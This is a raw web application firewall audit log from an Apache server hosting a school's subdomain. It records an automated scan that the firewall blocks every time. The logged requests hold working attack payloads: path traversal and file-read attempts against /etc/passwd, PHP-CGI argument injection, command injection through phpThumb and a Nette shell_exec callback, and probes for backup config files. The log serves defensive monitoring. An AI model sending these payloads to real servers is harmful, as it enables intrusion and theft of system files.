Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --3972cf08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3972cf08-E-- --3972cf08-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /index.php?page=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745424828315788 2124 (- - -) Stopwatch2: 1745424828315788 2124; combined=561, p1=416, p2=111, p3=0, p4=0, p5=34, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3972cf08-Z-- --dfd70b1a-A-- [23/Apr/2025:23:13:48 +0700] aAkRvDI97BrbgvDq16RshAAAAMo 103.236.140.4 38826 103.236.140.4 8181 --dfd70b1a-B-- GET /download_gambar.php?path=../../../../etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --dfd70b1a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dfd70b1a-E-- --dfd70b1a-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_gambar.php?path=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745424828513047 2096 (- - -) Stopwatch2: 1745424828513047 2096; combined=564, p1=430, p2=104, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dfd70b1a-Z-- --db572716-A-- [23/Apr/2025:23:13:48 +0700] aAkRvDI97BrbgvDq16RshgAAAMM 103.236.140.4 38832 103.236.140.4 8181 --db572716-B-- GET /download_video.php?file=../../../../etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --db572716-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --db572716-E-- --db572716-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_video.php?file=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745424828708095 2013 (- - -) Stopwatch2: 1745424828708095 2013; combined=566, p1=433, p2=104, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --db572716-Z-- --26914606-A-- [23/Apr/2025:23:13:48 +0700] aAkRvNIw_rqnm4P5_afOWQAAAEY 103.236.140.4 38842 103.236.140.4 8181 --26914606-B-- GET /download.php?path=../../../../etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --26914606-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --26914606-E-- --26914606-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download.php?path=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745424828903281 1788 (- - -) Stopwatch2: 1745424828903281 1788; combined=451, p1=314, p2=116, p3=0, p4=0, p5=21, sr=53, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --26914606-Z-- --0ff4b010-A-- [23/Apr/2025:23:13:49 +0700] aAkRvTI97BrbgvDq16RsiQAAANM 103.236.140.4 38848 103.236.140.4 8181 --0ff4b010-B-- GET /download.php?file=/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --0ff4b010-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0ff4b010-E-- --0ff4b010-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download.php?file=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745424829097308 1776 (- - -) Stopwatch2: 1745424829097308 1776; combined=503, p1=382, p2=93, p3=0, p4=0, p5=28, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ff4b010-Z-- --78050d6f-A-- [23/Apr/2025:23:13:49 +0700] aAkRvRuwXEWV6ydgl52YVwAAAAM 103.236.140.4 38850 103.236.140.4 8181 --78050d6f-B-- GET /download.php?file=../../../../etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --78050d6f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --78050d6f-E-- --78050d6f-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download.php?file=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745424829291783 2042 (- - -) Stopwatch2: 1745424829291783 2042; combined=696, p1=418, p2=250, p3=0, p4=0, p5=28, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --78050d6f-Z-- --517e4a1c-A-- [23/Apr/2025:23:13:49 +0700] aAkRvRuwXEWV6ydgl52YWQAAABM 103.236.140.4 38856 103.236.140.4 8181 --517e4a1c-B-- GET /download_worksheet.php?action=/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --517e4a1c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --517e4a1c-E-- --517e4a1c-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_worksheet.php?action=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745424829487189 2233 (- - -) Stopwatch2: 1745424829487189 2233; combined=606, p1=412, p2=166, p3=0, p4=0, p5=28, sr=75, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --517e4a1c-Z-- --d5503e25-A-- [23/Apr/2025:23:15:47 +0700] aAkSM9Iw_rqnm4P5_afPWAAAAEo 103.236.140.4 42252 103.236.140.4 8181 --d5503e25-B-- GET /config.inc.php.old HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --d5503e25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d5503e25-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".inc.php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745424947775940 1804 (- - -) Stopwatch2: 1745424947775940 1804; combined=711, p1=348, p2=337, p3=0, p4=0, p5=26, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d5503e25-Z-- --dc1c662f-A-- [23/Apr/2025:23:15:48 +0700] aAkSND1ahuoJLEjKiAU12wAAAJQ 103.236.140.4 42264 103.236.140.4 8181 --dc1c662f-B-- GET /config.inc.php.bak HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --dc1c662f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc1c662f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".inc.php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745424948168932 2396 (- - -) Stopwatch2: 1745424948168932 2396; combined=791, p1=376, p2=384, p3=0, p4=0, p5=30, sr=61, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc1c662f-Z-- --21bf7627-A-- [23/Apr/2025:23:15:49 +0700] aAkSNTI97BrbgvDq16Rt4AAAAMw 103.236.140.4 42314 103.236.140.4 8181 --21bf7627-B-- GET /index.php?-d+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Content-Length: 42 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --21bf7627-C-- --21bf7627-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --21bf7627-E-- --21bf7627-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:-d allow_url_include=on -d auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:-d allow_url_include=on -d auto_prepend_file=php://input: -d allow_url_include=on -d auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745424949563684 4175 (- - -) Stopwatch2: 1745424949563684 4175; combined=2849, p1=502, p2=2320, p3=0, p4=0, p5=27, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --21bf7627-Z-- --f4cde14f-A-- [23/Apr/2025:23:15:50 +0700] aAkSNhuwXEWV6ydgl52ZrwAAABg 103.236.140.4 42342 103.236.140.4 8181 --f4cde14f-B-- GET /phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --f4cde14f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f4cde14f-E-- --f4cde14f-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745424950542484 2405 (- - -) Stopwatch2: 1745424950542484 2405; combined=726, p1=420, p2=267, p3=0, p4=0, p5=39, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f4cde14f-Z-- --a6ad954f-A-- [23/Apr/2025:23:15:52 +0700] aAkSONIw_rqnm4P5_afPYAAAAEE 103.236.140.4 42394 103.236.140.4 8181 --a6ad954f-B-- GET /wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --a6ad954f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6ad954f-E-- --a6ad954f-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745424952159782 1604 (- - -) Stopwatch2: 1745424952159782 1604; combined=448, p1=317, p2=110, p3=0, p4=0, p5=21, sr=51, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6ad954f-Z-- --ac81b245-A-- [23/Apr/2025:23:15:52 +0700] aAkSOBuwXEWV6ydgl52ZtQAAAAw 103.236.140.4 42418 103.236.140.4 8181 --ac81b245-B-- GET /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1 HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --ac81b245-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ac81b245-E-- --ac81b245-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745424952959579 2339 (- - -) Stopwatch2: 1745424952959579 2339; combined=721, p1=463, p2=221, p3=0, p4=0, p5=36, sr=120, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac81b245-Z-- --75c18344-A-- [23/Apr/2025:23:15:53 +0700] aAkSOTI97BrbgvDq16Rt5gAAAMc 103.236.140.4 42440 103.236.140.4 8181 --75c18344-B-- GET /plugins/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --75c18344-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --75c18344-E-- --75c18344-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /plugins/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745424953560077 1795 (- - -) Stopwatch2: 1745424953560077 1795; combined=521, p1=354, p2=143, p3=0, p4=0, p5=24, sr=62, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75c18344-Z-- --3b669f36-A-- [23/Apr/2025:23:15:55 +0700] aAkSOz1ahuoJLEjKiAU18AAAAIY 103.236.140.4 42492 103.236.140.4 8181 --3b669f36-B-- GET /online-editor/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 